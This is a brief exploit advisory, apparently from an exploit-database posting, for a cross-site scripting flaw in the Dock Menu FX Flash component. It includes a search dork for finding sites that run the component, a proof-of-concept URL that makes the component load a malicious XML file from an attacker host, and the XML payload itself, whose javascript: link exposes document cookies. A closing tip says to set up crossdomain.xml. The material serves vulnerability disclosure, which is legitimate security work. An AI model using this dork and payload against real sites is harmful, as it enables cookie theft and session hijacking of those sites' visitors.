+ Vendor info
Dock Menu FX => XSS (CWE-79)
http://www.flashxml.net/dock-menu.html
Dork : inurl:"DockMenuFX.swf"
=========================================================
+ Author: devilteam.pl
+ WWW: http://devilteam.pl/
=========================================================
Example PoC:
http://foo.bar/DockMenuFX.swf?imagesXML=http://attacker.foobar/images.xml
images.xml:
<?xml version="1.0" encoding="UTF-8"?>
<dockmenu>
<photo image="http://image.address/someimg.png" url="javascript:alert('domain: ' + document.domain + ' cookies: ' + document.cookie)" ><![CDATA[DT]]></photo>
</dockmenu>
P.S
Dont forget crossdomain.xml
=========================================================
thx for:
http://cxsecurity.com/